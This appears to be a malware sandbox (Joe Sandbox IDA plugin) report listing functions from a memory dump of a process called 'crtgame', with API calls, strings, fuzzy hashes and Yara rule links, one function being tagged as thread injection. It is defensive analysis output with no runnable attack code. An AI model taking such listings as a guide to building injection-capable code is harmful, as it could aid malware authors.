Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 1ab79c1c4ed2638698de256f46622999ad035708644754600f09f88afe87fc90
Instruction ID: 66d19a2fed47fd9a6b1aec8237905535569179444541be70b06c83ce14a34e3b
Opcode Fuzzy Hash: 1ab79c1c4ed2638698de256f46622999ad035708644754600f09f88afe87fc90
Instruction Fuzzy Hash: 4EA1B276E003158FCB21CF58D980BAEB7A5FB94394F944669DC09E7350EB31E985CB90

Function 02C21C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C21CB1
CloseHandle.KERNEL32(?), ref: 02C21CBA
InterlockedExchangeAdd.KERNEL32(02C57468,00000000), ref: 02C21CC6
TerminateThread.KERNEL32(?,00000000), ref: 02C21CD4
QueueUserAPC.KERNEL32(02C21E7C,?,00000000), ref: 02C21CE1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C21CEC

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 1946104331-0
Opcode ID: bc9024c39fc50cb963f0602d22fbf7194ad162b94c4f60d7fac11765a809a470
Instruction ID: 5cc9b21b3d392b0b6d539bf3be580c5c94d8c133f9757bdeb7b8bdf0427c602f
Opcode Fuzzy Hash: bc9024c39fc50cb963f0602d22fbf7194ad162b94c4f60d7fac11765a809a470
Instruction Fuzzy Hash: E1F0A439941224BFDB204B9ADD0DD57FFFCEB85721700475AF52A82190DBB0A918CBA0

Function 02C31350 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02C3139F

Part of subcall function 02C31EF3: std::exception::_Copy_str.LIBCMT ref: 02C31F0C

Part of subcall function 02C30770: __CxxThrowException@8.LIBCMT ref: 02C307CE

std::exception::exception.LIBCMT ref: 02C313FE

Strings

boost unique_lock has no mutex, xrefs: 02C3138E
boost unique_lock owns already the mutex, xrefs: 02C313ED
$, xrefs: 02C31403

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
API String ID: 2140441600-46888669
Opcode ID: e785064b2254cb17d41b6d5aeaf6680391e62a8728668393ed6aefb6497ac863
Instruction ID: 10ae5623fde08fbe8a3b4ebeb677614c4619493d74c729a522ab0c477cecd87d
Opcode Fuzzy Hash: e785064b2254cb17d41b6d5aeaf6680391e62a8728668393ed6aefb6497ac863
Instruction Fuzzy Hash: ED2123B25087809FD721DF24C44475BBBE9BB89B48F404E5DF8A587280DBB5D808CF82

Function 02C22341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
GetLastError.KERNEL32 ref: 02C2237A

Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717

Strings

pqcs, xrefs: 02C22388

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1619523792-2559862021
Opcode ID: 1cf5454ac2476d949497733195dbced2ee4797a64e4a780cbfca087334a4659a
Instruction ID: 4d73df5d4128275d6621cd97ef3d6b7f3cd935b08cce52b758d526885ac4751a
Opcode Fuzzy Hash: 1cf5454ac2476d949497733195dbced2ee4797a64e4a780cbfca087334a4659a
Instruction Fuzzy Hash: 42F05B75A413146FD720AF749909B6B77ECDB41601F400659F90DD2140FB71E6189BD1

Function 02C24030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C24035
GetProcessHeap.KERNEL32(00000000,02C2A5D9,?,?,?,?,?,02C2A5D9), ref: 02C24042
RtlAllocateHeap.NTDLL(00000000), ref: 02C24049
std::exception::exception.LIBCMT ref: 02C24063

Part of subcall function 02C2A069: __EH_prolog.LIBCMT ref: 02C2A06E
Part of subcall function 02C2A069: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A07D
Part of subcall function 02C2A069: __CxxThrowException@8.LIBCMT ref: 02C2A09C

Strings

bad allocation, xrefs: 02C24058

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
String ID: bad allocation
API String ID: 3112922283-2104205924
Opcode ID: 98f8be0dd9012a80705025b2c5a09cf1c18b4caff403c26f8cf41e9ed1d578ae
Instruction ID: 3c83f34a9416dc52680051971746ca82fed5e982e83078fab8eb84c1cb076c72
Opcode Fuzzy Hash: 98f8be0dd9012a80705025b2c5a09cf1c18b4caff403c26f8cf41e9ed1d578ae
Instruction Fuzzy Hash: 68F0F8B1E44209AFDB14AFE0D908BAFBB79FB08745F404A59E915A2280DB7552188FE1

Function 02C316A0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C31470: CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C314C1
Part of subcall function 02C31470: WaitForSingleObject.KERNEL32(?,000000FF,AC2FC4E2,?,?,?,?,AC2FC4E2,02C31443,AC2FC4E2), ref: 02C314D8

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3173E
ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3175E
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C31797
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C317EB
SetEvent.KERNEL32(?), ref: 02C317F2

Part of subcall function 02C2418C: CloseHandle.KERNEL32(00000000,?,02C31725), ref: 02C241B0

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
String ID:
API String ID: 4166353394-0
Opcode ID: 30c815e4c47e027d7172bb4fc68667b30cd1bc27c4b594db050f25542b1d42b1
Instruction ID: 68b18f7fa2af06ed5ca3e0b64ea2cbbdec79f4f87aabdd895b94ce3c8d0fac40
Opcode Fuzzy Hash: 30c815e4c47e027d7172bb4fc68667b30cd1bc27c4b594db050f25542b1d42b1
Instruction Fuzzy Hash: B441B1716003118FDB269F18CC80B1777E8EB86764F1C0A68EC189B295D775D915CBA5

Function 02C2DA97 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2DA9C

Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB1B
RtlEnterCriticalSection.NTDLL(?), ref: 02C2DB37
InterlockedIncrement.KERNEL32(02C55170), ref: 02C2DB5C
RtlLeaveCriticalSection.NTDLL(?), ref: 02C2DB71

Part of subcall function 02C227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C2284E

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
String ID:
API String ID: 1578506061-0
Opcode ID: 316bf89c03d877c0c987adaefc1f2d3ca5b349a4faeac2f4680e6cc3b7f7ddd0
Instruction ID: 2e592b7a8a007a7d117958ef02d0c0185facc25a507509db1c54602126b6460d
Opcode Fuzzy Hash: 316bf89c03d877c0c987adaefc1f2d3ca5b349a4faeac2f4680e6cc3b7f7ddd0
Instruction Fuzzy Hash: AA3128B19013149FCB10DFA9C9447AEBBF8BF58310F14855ED84AD7641EB74A608CFA1

Function 02C221D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C221DA
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221ED
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C22224
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C22237
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C22261

Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: 31f69a0976b196842b530e05b7a2acdf70c68837122e43625cc8fbcaec62f353
Instruction ID: b1ce02886a3d1f6d655728d1a9e90ad60f5abd0a94875bbdd2b0caebaef9b352
Opcode Fuzzy Hash: 31f69a0976b196842b530e05b7a2acdf70c68837122e43625cc8fbcaec62f353
Instruction Fuzzy Hash: A8116D72D01229DBCB119FA5E8046AEFFBAFB44320F104A1AE815A2260DB718659DF81

Function 02C22298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2229D
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C222B0
TlsGetValue.KERNEL32 ref: 02C222E7
TlsSetValue.KERNEL32(?), ref: 02C22300
TlsSetValue.KERNEL32(?,?,?), ref: 02C2231C

Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: fd0e59fa7de4863740902fd6be51ab62c0e0a7e47a95140bc7e3a0e9dc4f823b
Instruction ID: b12c28870811616b16d77193ee66d71abb2bad9bc38c383d59a086a82f30ac4b
Opcode Fuzzy Hash: fd0e59fa7de4863740902fd6be51ab62c0e0a7e47a95140bc7e3a0e9dc4f823b
Instruction Fuzzy Hash: B8115E76D012299FCB019FA5EC046AEFFBAFF44310F14855AE804A3210DB719A59DF91

Function 02C2B6B1 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02C2AB04: __EH_prolog.LIBCMT ref: 02C2AB09

__CxxThrowException@8.LIBCMT ref: 02C2B6CE

Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6E4
InterlockedExchange.KERNEL32(?,00000001), ref: 02C2B6F7
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B707
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2B715

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
String ID:
API String ID: 2725315915-0
Opcode ID: 48ed175bf17b53a28570c820f1de637610cf3a72fb7d49e2afc7c8bc3703455a
Instruction ID: df3dc80281a8579ad17c0a8433e57459f7315b390053591bfbc6bdfb9c5ef6fa
Opcode Fuzzy Hash: 48ed175bf17b53a28570c820f1de637610cf3a72fb7d49e2afc7c8bc3703455a
Instruction Fuzzy Hash: 130186BAA40215AFDB109BA4DC89F8777EDEB04759F004955F615D7190DB61E8088BA0

Function 02C22420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
String ID:
API String ID: 747265849-0
Opcode ID: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
Instruction ID: d35dc45eefddae35db2378663f7793875b2ba667244407ea11869291e080f454
Opcode Fuzzy Hash: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
Instruction Fuzzy Hash: 93F03076641214BBD7109BA0ED89FDBB76CFB44711F804911F701D6480DB61BA28CBE1

Function 02C21EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(?), ref: 02C21ED2
PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C21EEA
RtlEnterCriticalSection.NTDLL(?), ref: 02C21EF9
InterlockedExchange.KERNEL32(?,00000001), ref: 02C21F0E
RtlLeaveCriticalSection.NTDLL(?), ref: 02C21F15

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
String ID:
API String ID: 830998967-0
Opcode ID: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
Instruction ID: 481f680f45e20daac694abfc6533fefe31c8d4e70012da3eacd49e739e44b272
Opcode Fuzzy Hash: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
Instruction Fuzzy Hash: 49F01776642615BBDB01AFA1ED88FCBBBACFB54751F000512F60182441DB61BA69CBE1

Function 02C230AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C230C3
WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C23102
_memcmp.LIBCMT ref: 02C23141

Strings

255.255.255.255, xrefs: 02C23139

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AddressErrorLastString_memcmp
String ID: 255.255.255.255
API String ID: 1618111833-2422070025
Opcode ID: bc802be544b4ac23c2f480c079663d194c2241acb83f87d4b720531efe556ecd
Instruction ID: 102ef25258f9cc482278937b26f5a28caeacb477adbe4be48648d65488c51ed7
Opcode Fuzzy Hash: bc802be544b4ac23c2f480c079663d194c2241acb83f87d4b720531efe556ecd
Instruction Fuzzy Hash: BA31E473A003689FDB219F74CC8076EB7B6AF85314F1049ADEC559B280DF759A49CB90

Function 02C21F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C21F5B
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C21FC5
GetLastError.KERNEL32(?,00000000), ref: 02C21FD2

Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717

Strings

iocp, xrefs: 02C21FE0

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$CompletionCreateErrorLastPort
String ID: iocp
API String ID: 998023749-976528080
Opcode ID: b18b6630d8d72549737c5e74dc07e089c0257f1792b28d189c543f2b1993f6d7
Instruction ID: 186c28363d9d69895b27cf5e448f57cebdfa62ed8104c2d569fdeaded2fe9bee
Opcode Fuzzy Hash: b18b6630d8d72549737c5e74dc07e089c0257f1792b28d189c543f2b1993f6d7
Instruction Fuzzy Hash: FC21C5B1901B449FC720DF6AD50455BFBF8FFA4720B108A1FD4A697AA0D7B0A644CF91

Function 02C3356D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C33585

Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F

std::exception::exception.LIBCMT ref: 02C335A3
__CxxThrowException@8.LIBCMT ref: 02C335B8

Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF

Strings

bad allocation, xrefs: 02C33598

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: 0e8fbfa288948fd14c446075b89951d3ed8a27d946800fbfc1415a2e2d7abe48
Instruction ID: 4e3485fed15f63837cf2284705701b2f44edf6ce3ebf81cce4e2b7e4459b71b4
Opcode Fuzzy Hash: 0e8fbfa288948fd14c446075b89951d3ed8a27d946800fbfc1415a2e2d7abe48
Instruction Fuzzy Hash: BEE0307150020AAADF02AEA4DD049AFBB69AB04354F404EE5EC15A6590DF729B44D9E1

Function 02C237B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C237B6
__localtime64.LIBCMT ref: 02C237C1

Part of subcall function 02C32020: __gmtime64_s.LIBCMT ref: 02C32033

std::exception::exception.LIBCMT ref: 02C237D9

Part of subcall function 02C31EF3: std::exception::_Copy_str.LIBCMT ref: 02C31F0C

Part of subcall function 02C29EC7: __EH_prolog.LIBCMT ref: 02C29ECC
Part of subcall function 02C29EC7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29EDB
Part of subcall function 02C29EC7: __CxxThrowException@8.LIBCMT ref: 02C29EFA

Strings

could not convert calendar time to UTC time, xrefs: 02C237CE

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
String ID: could not convert calendar time to UTC time
API String ID: 1963798777-2088861013
Opcode ID: 1c3773b69f75adbd2ecb97554c4a8858b8dc3867965a14a7ee123282638a0c88
Instruction ID: 77bdcfcf2a3a3b72b8eced6874e79c34522c5c2ae4bc46c20e2c3a03cf5ffaca
Opcode Fuzzy Hash: 1c3773b69f75adbd2ecb97554c4a8858b8dc3867965a14a7ee123282638a0c88
Instruction Fuzzy Hash: CDE06DB1D002999BCF15EF94D9047EFB779FB14304F00499AD815A2640DF355A09DE81

Function 02C30D40 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30DDF

Part of subcall function 02C23FDC: __EH_prolog.LIBCMT ref: 02C23FE1
Part of subcall function 02C23FDC: CreateEventA.KERNEL32(00000000,02C2A5D9,?,00000000), ref: 02C23FF3

CloseHandle.KERNEL32(00000000), ref: 02C30DD4
CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30E20
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30EF1

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$CreateH_prolog
String ID:
API String ID: 2825413587-0
Opcode ID: 50ac837d223931f405701380eb20b0cffee39cd902c0b3ca2aceb397fb3a905b
Instruction ID: 6754f713ef2d65f234bcc7746fd749e5fed268ea96d6f63bab0af68a3ec6d758
Opcode Fuzzy Hash: 50ac837d223931f405701380eb20b0cffee39cd902c0b3ca2aceb397fb3a905b
Instruction Fuzzy Hash: 005196766003458FDB22DF28C88475B77E5FF88328F154B18E899A7390D735E945CB91

Function 02C3F935 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3F96B
__isleadbyte_l.LIBCMT ref: 02C3F999
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9C7
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9FD

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 04315e5edc3580ff205cb9c6771e5bfced7ae5537b05d78fbb8520729968d777
Instruction ID: f712e8b5d63da81ac71512546f502bb8055674d7033a7aea54715d18a589369a
Opcode Fuzzy Hash: 04315e5edc3580ff205cb9c6771e5bfced7ae5537b05d78fbb8520729968d777
Instruction Fuzzy Hash: 3531CC31A00286BFDB228E35C844BBA7BA6FF81314F154C2DE869975A0E730E950DB90

Function 02C3FDC4 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C3FDD0

Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: ee55a7a9e3733ab81ac186e760eeb2a88a793c5f05bc60699ece669345854e49
Instruction ID: 8fe8669e49db3971d5d5eac6b81c3bffebfa694011c6e674fd81700901756c15
Opcode Fuzzy Hash: ee55a7a9e3733ab81ac186e760eeb2a88a793c5f05bc60699ece669345854e49
Instruction Fuzzy Hash: FD110632C40712AFCF233F74A80875A7BDA9F083A1B104E2EE94D96690DB30C980DE91

Function 02C31DA3 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C31DB2
___ascii_stricmp.LIBCMT ref: 02C31DEA
__tolower_l.LIBCMT ref: 02C31E00

Part of subcall function 02C3539A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C353A8
Part of subcall function 02C3539A: __isctype_l.LIBCMT ref: 02C353C9

__tolower_l.LIBCMT ref: 02C31E0F

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
String ID:
API String ID: 2995433114-0
Opcode ID: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
Instruction ID: 71b5c9b9da41b6bcf8265044043fafd51f06cffa0216bd9afdfa15ea42a630cc
Opcode Fuzzy Hash: 5a6fd3737516604066ab84fcf8fec551fc8a64089d8b76893633279989ef553f
Instruction Fuzzy Hash: 92110D729001596FC713AA698884B7A77A9EB45360F180F58E82957180EFB15E01DA90

Function 02C23D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 02C23DA2

Part of subcall function 02C23BD3: __EH_prolog.LIBCMT ref: 02C23BD8
Part of subcall function 02C23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C23BED

htonl.WS2_32(00000000), ref: 02C23DB9
htonl.WS2_32(00000000), ref: 02C23DC0
htons.WS2_32(?), ref: 02C23DD4

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
String ID:
API String ID: 3882411702-0
Opcode ID: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
Instruction ID: 93cef359744148741e6c31dc23e0e63c102628f62cb8d5be539c041f174caad6
Opcode Fuzzy Hash: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
Instruction Fuzzy Hash: 6111E139A00248EFCF019F64D885A5AB7B9FF08310F008896FC08DF201DB71DA18CBA1

Function 02C2239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C2335F,?,?,?,?,?), ref: 02C223D0
RtlEnterCriticalSection.NTDLL(?), ref: 02C223DE
InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C22401
RtlLeaveCriticalSection.NTDLL(?), ref: 02C22408

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: e5e277de811cf135e1279240513c5cd8d0c03bfe673b12dfe0c5c9483fcc0aca
